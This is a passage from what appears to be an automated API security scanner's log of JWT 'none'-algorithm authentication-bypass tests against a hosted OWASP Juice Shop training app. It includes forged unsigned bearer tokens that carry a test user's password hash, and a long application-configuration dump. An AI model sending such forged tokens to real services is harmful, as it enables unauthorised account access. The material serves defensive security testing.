son, text/plain, */*","authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","host":"juiceshop.akto.io","connection":"close","content-type":"application/json","accept-encoding":"gzip, deflate","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","sec-fetch-dest":"empty"}}

Attempted response: {statusCode=401.0, body=Wrong answer to CAPTCHA. Please try again., headers={"date":"Fri, 29 Sep 2023 08:58:26 GMT","access-control-allow-origin":"*","content-length":"42","x-content-type-options":"nosniff","x-recruiting":"/#/jobs","vary":"Accept-Encoding","x-frame-options":"SAMEORIGIN","content-type":"text/html; charset=utf-8","etag":"W/\"2a-0bhawgvZt+oT5sCkemBQdamCIP0\"","feature-policy":"payment 'self'"}}


 ------------------------------------ 

API: https://juiceshop.akto.io/api/Quantitys/ GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}

Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"1767-X/Pg1v7ucUbFOCl+zVcvncfYQCM\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"5991","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"application/json; charset=utf-8"}
{"status":"success","data":[{"ProductId":1,"id":1,"quantity":95,"limitPerUser":5,"createdAt":"2023-03-09T14:46:29.405Z","updatedAt":"2023-03-09T14:46:29.405Z"},{"ProductId":2,"id":2,"quantity":64,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.405Z","updatedAt":"2023-03-09T14:46:29.405Z"},{"ProductId":3,"id":3,"quantity":97,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.405Z","updatedAt":"2023-03-09T14:46:29.405Z"},{"ProductId":4,"id":4,"quantity":70,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.405Z","updatedAt":"2023-03-09T14:46:29.405Z"},{"ProductId":5,"id":5,"quantity":60,"limitPerUser":5,"createdAt":"2023-03-09T14:46:29.405Z","updatedAt":"2023-03-09T14:46:29.405Z"},{"ProductId":6,"id":6,"quantity":64,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":7,"id":7,"quantity":56,"limitPerUser":5,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":8,"id":8,"quantity":67,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":9,"id":9,"quantity":33,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":10,"id":10,"quantity":60,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":11,"id":11,"quantity":79,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":12,"id":12,"quantity":49,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":13,"id":13,"quantity":70,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":14,"id":14,"quantity":51,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":15,"id":15,"quantity":44,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":16,"id":16,"quantity":44,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":17,"id":17,"quantity":49,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":18,"id":18,"quantity":37,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":19,"id":19,"quantity":93,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":20,"id":20,"quantity":5,"limitPerUser":5,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":21,"id":21,"quantity":70,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":22,"id":22,"quantity":68,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":23,"id":23,"quantity":86,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":24,"id":24,"quantity":64,"limitPerUser":5,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":25,"id":25,"quantity":43,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":26,"id":26,"quantity":68,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":27,"id":27,"quantity":0,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":28,"id":28,"quantity":33,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":29,"id":29,"quantity":53,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":30,"id":30,"quantity":94,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":31,"id":31,"quantity":72,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":32,"id":32,"quantity":57,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":33,"id":33,"quantity":3,"limitPerUser":1,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":34,"id":34,"quantity":0,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":35,"id":35,"quantity":8,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":36,"id":36,"quantity":0,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":37,"id":37,"quantity":0,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":38,"id":38,"quantity":0,"limitPerUser":1,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":39,"id":39,"quantity":55,"limitPerUser":5,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":40,"id":40,"quantity":2,"limitPerUser":1,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":41,"id":41,"quantity":1,"limitPerUser":1,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":42,"id":42,"quantity":1,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":43,"id":43,"quantity":3,"limitPerUser":1,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":44,"id":44,"quantity":66,"limitPerUser":1,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"}]}
Attempted errors : 
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution


 ------------------------------------ 

API: https://juiceshop.akto.io/redirect GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"document","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"navigate","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","Upgrade-Insecure-Requests":"1","sec-ch-ua-platform":"\"macOS\"","Sec-Fetch-User":"?1","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}

Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept, Accept-Encoding","Content-Length":"124","Date":"Thu, 09 Mar 2023 14:51:55 GMT","Location":"https://github.com/bkimminich/juice-shop","Content-Type":"text/html; charset=utf-8"}
<p>Found. Redirecting to <a href="https://github.com/bkimminich/juice-shop">https://github.com/bkimminich/juice-shop</a></p>
Attempted errors : 
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution


 ------------------------------------ 

API: https://juiceshop.akto.io/rest/admin/application-configuration GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}

Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"49c9-x09b6mieS3DRRyUh3KjdGS72SnM\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"18889","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"application/json; charset=utf-8"}
{"config":{"server":{"port":3000,"basePath":""},"application":{"domain":"juice-sh.op","name":"OWASP Juice Shop","logo":"JuiceShop_Logo.png","favicon":"favicon_js.ico","theme":"bluegrey-lightgreen","showVersionNumber":true,"showGitHubLinks":true,"localBackupEnabled":true,"numberOfRandomFakeUsers":0,"altcoinName":"Juicycoin","privacyContactEmail":"donotreply@owasp-juice.shop","customMetricsPrefix":"juiceshop","chatBot":{"name":"Juicy","greeting":"Nice to meet you <customer-name>, I'm <bot-name>","trainingData":"botDefaultTrainingData.json","defaultResponse":"Sorry I couldn't understand what you were trying to say","avatar":"JuicyChatBot.png"},"social":{"twitterUrl":"https://twitter.com/owasp_juiceshop","facebookUrl":"https://www.facebook.com/owasp.juiceshop","slackUrl":"https://owasp.org/slack/invite","redditUrl":"https://www.reddit.com/r/owasp_juiceshop","pressKitUrl":"https://github.com/OWASP/owasp-swag/tree/master/projects/juice-shop","nftUrl":"https://opensea.io/collection/juice-shop","questionnaireUrl":null},"recyclePage":{"topProductImage":"fruit_press.jpg","bottomProductImage":"apple_pressings.jpg"},"welcomeBanner":{"showOnFirstStart":true,"title":"Welcome to OWASP Juice Shop!","message":"<p>Being a web application with a vast number of intended security vulnerabilities, the <strong>OWASP Juice Shop</strong> is supposed to be the opposite of a best practice or template application for web developers: It is an awareness, training, demonstration and exercise tool for security risks in modern web applications. The <strong>OWASP Juice Shop</strong> is an open-source project hosted by the non-profit <a href='https://owasp.org' target='_blank'>Open Web Application Security Project (OWASP)</a> and is developed and maintained by volunteers. Check out the link below for more information and documentation on the project.</p><h1><a href='https://owasp-juice.shop' target='_blank'>https://owasp-juice.shop</a></h1>"},"cookieConsent":{"backgroundColor":"#546e7a","textColor":"#ffffff","buttonColor":"#558b2f","buttonTextColor":"#ffffff","message":"This website uses fruit cookies to ensure you get the juiciest tracking experience.","dismissText":"Me want it!","linkText":"But me wait!","linkUrl":"https://www.youtube.com/watch?v=9PnbKL3wuH4"},"securityTxt":{"contact":"mailto:donotreply@owasp-juice.shop","encryption":"https://keybase.io/bkimminich/pgp_keys.asc?fingerprint=19c01cb7157e4645e9e2c863062a85a8cbfbdcda","acknowledgements":"/#/score-board","hiring":"/#/jobs"},"promotion":{"video":"owasp_promo.mp4","subtitles":"owasp_promo.vtt"},"easterEggPlanet":{"name":"Orangeuze","overlayMap":"orangemap2k.jpg"},"googleOauth":{"clientId":"1005568560502-6hm16lef8oh46hr2d98vf2ohlnj4nfhq.apps.googleusercontent.com","authorizedRedirects":[{"uri":"https://demo.owasp-juice.shop"},{"uri":"https://juice-shop.herokuapp.com"},{"uri":"https://preview.owasp-juice.shop"},{"uri":"https://juice-shop-staging.herokuapp.com"},{"uri":"https://juice-shop.wtf"},{"uri":"https://juiceshop.akto.io","proxy":"https://local3000.owasp-juice.shop"},{"uri":"http://127.0.0.1:3000","proxy":"https://local3000.owasp-juice.shop"},{"uri":"http://localhost:4200","proxy":"https://local4200.owasp-juice.shop"},{"uri":"http://127.0.0.1:4200","proxy":"https://local4200.owasp-juice.shop"},{"uri":"http://192.168.99.100:3000","proxy":"https://localmac.owasp-juice.shop"},{"uri":"http://192.168.99.100:4200","proxy":"https://localmac.owasp-juice.shop"},{"uri":"http://penguin.termina.linux.test:3000","proxy":"https://localchromeos.owasp-juice.shop"},{"uri":"http://penguin.termina.linux.test:4200","proxy":"https://localchromeos.owasp-juice.shop"}]}},"challenges":{"showSolvedNotifications":true,"showHints":true,"showMitigations":true,"codingChallengesEnabled":"solved","restrictToTutorialsFirst":false,"overwriteUrlForProductTamperingChallenge":"https://owasp.slack.com","xssBonusPayload":"<iframe width=\"100%\" height=\"166\" scrolling=\"no\" frameborder=\"no\" allow=\"autoplay\" src=\"https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true\"></iframe>","safetyOverride":false,"showFeedbackButtons":true},"hackingInstructor":{"isEnabled":true,"avatarImage":"JuicyBot.png","hintPlaybackSpeed":"normal"},"products":[{"name":"Apple Juice (1000ml)","price":1.99,"deluxePrice":0.99,"limitPerUser":5,"description":"The all-time classic.","image":"apple_juice.jpg","reviews":[{"text":"One of my favorites!","author":"admin"},{"text":"Best thing ever!","author":"victim"}]},{"name":"Orange Juice (1000ml)","description":"Made from oranges hand-picked by Uncle Dittmeyer.","price":2.99,"deluxePrice":2.49,"image":"orange_juice.jpg","reviews":[{"text":"y0ur f1r3wall needs m0r3 musc13","author":"uvogin"}]},{"name":"Eggfruit Juice (500ml)","description":"Now with even more exotic flavour.","price":8.99,"image":"eggfruit_juice.jpg","reviews":[{"text":"I bought it, would buy again. 5/7","author":"admin"}]},{"name":"Raspberry Juice (1000ml)","description":"Made from blended Raspberry Pi, water and sugar.","price":4.99,"image":"raspberry_juice.jpg"},{"name":"Lemon Juice (500ml)","description":"Sour but full of vitamins.","price":2.99,"deluxePrice":1.99,"limitPerUser":5,"image":"lemon_juice.jpg"},{"name":"Banana Juice (1000ml)","description":"Monkeys love it the most.","price":1.99,"image":"banana_juice.jpg","reviews":[{"text":"Fry liked it too.","author":"bender"}]},{"name":"OWASP Juice Shop T-Shirt","description":"Real fans wear it 24/7!","price":22.49,"limitPerUser":5,"image":"fan_shirt.jpg"},{"name":"OWASP Juice Shop CTF Girlie-Shirt","description":"For serious Capture-the-Flag heroines only!","price":22.49,"image":"fan_girlie.jpg"},{"name":"OWASP SSL Advanced Forensic Tool (O-Saft)","description":"O-Saft is an easy to use tool to show information about SSL certificate and tests the SSL connection according given list of ciphers and various SSL configurations.","price":0.01,"image":"orange_juice.jpg","urlForProductTamperingChallenge":"https://www.owasp.org/index.php/O-Saft"},{"name":"Christmas Super-Surprise-Box (2014 Edition)","description":"Contains a random selection of 10 bottles (each 500ml) of our tastiest juices and an extra fan shirt for an unbeatable price!","price":29.99,"image":"undefined.jpg","useForChristmasSpecialChallenge":true},{"name":"Rippertuer Special Juice","description":"Contains a magical collection of the rarest fruits gathered from all around the world, like Cherymoya Annona cherimola, Jabuticaba Myrciaria cauliflora, Bael Aegle marmelos... and others, at an unbelievable price! <br/><span style=\"color:red;\">This item has been made unavailable because of lack of safety standards.</span>","price":16.99,"image":"undefined.jpg","keywordsForPastebinDataLeakChallenge":["hueteroneel","eurogium edule"]},{"name":"OWASP Juice Shop Sticker (2015/2016 design)","description":"Die-cut sticker with the official 2015/2016 logo. By now this is a rare collectors item. <em>Out of stock!</em>","price":999.99,"image":"sticker.png","deletedDate":"2017-04-28"},{"name":"OWASP Juice Shop Iron-Ons (16pcs)","description":"Upgrade your clothes with washer safe <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">iron-ons</a> of the OWASP Juice Shop or CTF Extension logo!","price":14.99,"image":"iron-on.jpg"},{"name":"OWASP Juice Shop Magnets (16pcs)","description":"Your fridge will be even cooler with these OWASP Juice Shop or CTF Extension logo <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">magnets</a>!","price":15.99,"image":"magnets.jpg"},{"name":"OWASP Juice Shop Sticker Page","description":"Massive decoration opportunities with these OWASP Juice Shop or CTF Extension <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">sticker pages</a>! Each page has 16 stickers on it.","price":9.99,"image":"sticker_page.jpg"},{"name":"OWASP Juice Shop Sticker Single","description":"Super high-quality vinyl <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">sticker single</a> with the OWASP Juice Shop or CTF Extension logo! The ultimate laptop decal!","price":4.99,"image":"sticker_single.jpg"},{"name":"OWASP Juice Shop Temporary Tattoos (16pcs)","description":"Get one of these <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">temporary tattoos</a> to proudly wear the OWASP Juice Shop or CTF Extension logo on your skin! If you tweet a photo of yourself with the tattoo, you get a couple of our stickers for free! Please mention <a href=\"https://twitter.com/owasp_juiceshop\" target=\"_blank\"><code>@owasp_juiceshop</code></a> in your tweet!","price":14.99,"image":"tattoo.jpg","reviews":[{"text":"I straight-up gots nuff props fo'these tattoos!","author":"rapper"}]},{"name":"OWASP Juice Shop Mug","description":"Black mug with regular logo on one side and CTF logo on the other! Your colleagues will envy you!","price":21.99,"image":"fan_mug.jpg"},{"name":"OWASP Juice Shop Hoodie","description":"Mr. Robot-style apparel. But in black. And with logo.","price":49.99,"image":"fan_hoodie.jpg"},{"name":"OWASP Juice Shop-CTF Velcro Patch","description":"4x3.5\" embroidered patch with velcro backside. The ultimate decal for every tactical bag or backpack!","price":2.92,"quantity":5,"limitPerUser":5,"image":"velcro-patch.jpg","reviews":[{"text":"This thang would look phat on Bobby's jacked fur coat!","author":"rapper"},{"text":"Looks so much better on my uniform than the boring Starfleet symbol.","author":"jim"}]},{"name":"Woodruff Syrup \"Forest Master X-Treme\"","description":"Harvested and manufactured in the Black Forest, Germany. Can cause hyperactive behavior in children. Can cause permanent green tongue when consumed undiluted.","price":6.99,"image":"woodruff_syrup.jpg"},{"name":"Green Smoothie","description":"Looks poisonous but is actually very good for your health! Made from green cabbage, spinach, kiwi and grass.","price":1.99,"image":"green_smoothie.jpg","reviews":[{"text":"Fresh out of a replicator.","author":"jim"}]},{"name":"Quince Juice (1000ml)","description":"Juice of the <em>Cydonia oblonga</em> fruit. Not exactly sweet but rich in Vitamin C.","price":4.99,"image":"quince.jpg"},{"name":"Apple Pomace","description":"Finest pressings of apples. Allergy disclaimer: Might contain traces of worms. Can be <a href=\"/#recycle\">sent back to us</a> for recycling.","price":0.89,"limitPerUser":5,"image":"apple_pressings.jpg"},{"name":"Fruit Press","description":"Fruits go in. Juice comes out. Pomace you can send back to us for recycling purposes.","price":89.99,"image":"fruit_press.jpg"},{"name":"OWASP Juice Shop Logo (3D-printed)","description":"This rare item was designed and handcrafted in Sweden. This is why it is so incredibly expensive despite its complete lack of purpose.","price":99.99,"image":"3d_keychain.jpg","fileForRetrieveBlueprintChallenge":"JuiceShop.stl","exifForBlueprintChallenge":["OpenSCAD"]},{"name":"Juice Shop Artwork","description":"Unique masterpiece painted with different kinds of juice on 90g/m² lined paper.","price":278.74,"quantity":0,"image":"artwork.jpg","deletedDate":"2020-12-24"},{"name":"Global OWASP WASPY Award 2017 Nomination","description":"Your chance to nominate up to three quiet pillars of the OWASP community ends 2017-06-30! <a href=\"https://www.owasp.org/index.php/WASPY_Awards_2017\">Nominate now!</a>","price":0.03,"image":"waspy.png","deletedDate":"2017-07-01"},{"name":"Strawberry Juice (500ml)","description":"Sweet & tasty!","price":3.99,"image":"strawberry_juice.jpeg"},{"name":"Carrot Juice (1000ml)","description":"As the old German saying goes: \"Carrots are good for the eyes. Or has anyone ever seen a rabbit with glasses?\"","price":2.99,"image":"carrot_juice.jpeg","reviews":[{"text":"0 st4rs f0r 7h3 h0rr1bl3 s3cur17y","author":"uvogin"}]},{"name":"OWASP Juice Shop Sweden Tour 2017 Sticker Sheet (Special Edition)","description":"10 sheets of Sweden-themed stickers with 15 stickers on each.","price":19.1,"image":"stickersheet_se.png","deletedDate":"2017-09-20"},{"name":"Pwning OWASP Juice Shop","description":"<em>The official Companion Guide</em> by Björn Kimminich available <a href=\"https://leanpub.com/juice-shop\">for free on LeanPub</a> and also <a href=\"https://pwning.owasp-juice.shop\">readable online</a>!","price":5.99,"image":"cover_small.jpg","reviews":[{"text":"Even more interesting than watching Interdimensional Cable!","author":"morty"}]},{"name":"Melon Bike (Comeback-Product 2018 Edition)","description":"The wheels of this bicycle are made from real water melons. You might not want to ride it up/down the curb too hard.","price":2999,"quantity":3,"limitPerUser":1,"image":"melon_bike.jpeg"},{"name":"OWASP Juice Shop Coaster (10pcs)","description":"Our 95mm circle coasters are printed in full color and made from thick, premium coaster board.","price":19.99,"quantity":0,"image":"coaster.jpg"},{"name":"OWASP Snakes and Ladders - Web Applications","description":"This amazing web application security awareness board game is <a href=\"https://steamcommunity.com/sharedfiles/filedetails/?id=1969196030\">available for Tabletop Simulator on Steam Workshop</a> now!","price":0.01,"quantity":8,"image":"snakes_ladders.jpg","reviews":[{"text":"Wait for a 10$ Steam sale of Tabletop Simulator!","author":"bjoernOwasp"}]},{"name":"OWASP Snakes and Ladders - Mobile Apps","description":"This amazing mobile app security awareness board game is <a href=\"https://steamcommunity.com/sharedfiles/filedetails/?id=1970691216\">available for Tabletop Simulator on Steam Workshop</a> now!","price":0.01,"quantity":0,"image":"snakes_ladders_m.jpg","reviews":[{"text":"Here yo' learn how tha fuck ta not show yo' goddamn phone on camera!","author":"rapper"}]},{"name":"OWASP Juice Shop Holographic Sticker","description":"Die-cut holographic sticker. Stand out from those 08/15-sticker-covered laptops with this shiny beacon of 80's coolness!","price":2,"quantity":0,"image":"holo_sticker.png","reviews":[{"text":"Rad, dude!","author":"rapper"},{"text":"Looks spacy on Bones' new tricorder!","author":"jim"},{"text":"Will put one on the Planet Express ship's bumper!","author":"bender"}]},{"name":"OWASP Juice Shop \"King of the Hill\" Facemask","description":"Facemask with compartment for filter from 50% cotton and 50% polyester.","price":13.49,"quantity":0,"limitPerUser":1,"image":"fan_facemask.jpg","reviews":[{"text":"K33p5 y0ur ju1cy 5plu773r 70 y0ur53lf!","author":"uvogin"},{"text":"Puny mask for puny human weaklings!","author":"bender"}]},{"name":"Juice Shop Adversary Trading Card (Common)","description":"Common rarity \"Juice Shop\" card for the <a href=\"https://docs.google.com/forms/d/e/1FAIpQLSecLEakawSQ56lBe2JOSbFwFYrKDCIN7Yd3iHFdQc5z8ApwdQ/viewform\">Adversary Trading Cards</a> CCG.","price":2.99,"deluxePrice":0.99,"deletedDate":"2020-11-30","limitPerUser":5,"image":"ccg_common.png","reviews":[{"text":"Ooooh, puny human playing Mau Mau, now?","author":"bender"}]},{"name":"Juice Shop Adversary Trading Card (Super Rare)","description":"Super rare \"Juice Shop\" card with holographic foil-coating for the <a href=\"https://docs.google.com/forms/d/e/1FAIpQLSecLEakawSQ56lBe2JOSbFwFYrKDCIN7Yd3iHFdQc5z8ApwdQ/viewform\">Adversary Trading Cards</a> CCG.","price":99.99,"deluxePrice":69.99,"deletedDate":"2020-11-30","quantity":2,"limitPerUser":1,"image":"ccg_foil.png","reviews":[{"text":"Mau Mau with bling-bling? Humans are so pathetic!","author":"bender"}]},{"name":"Juice Shop \"Permafrost\" 2020 Edition","description":"Exact version of <a href=\"https://github.com/juice-shop/juice-shop/releases/tag/v9.3.1-PERMAFROST\">OWASP Juice Shop that was archived on 02/02/2020</a> by the GitHub Archive Program and ultimately went into the 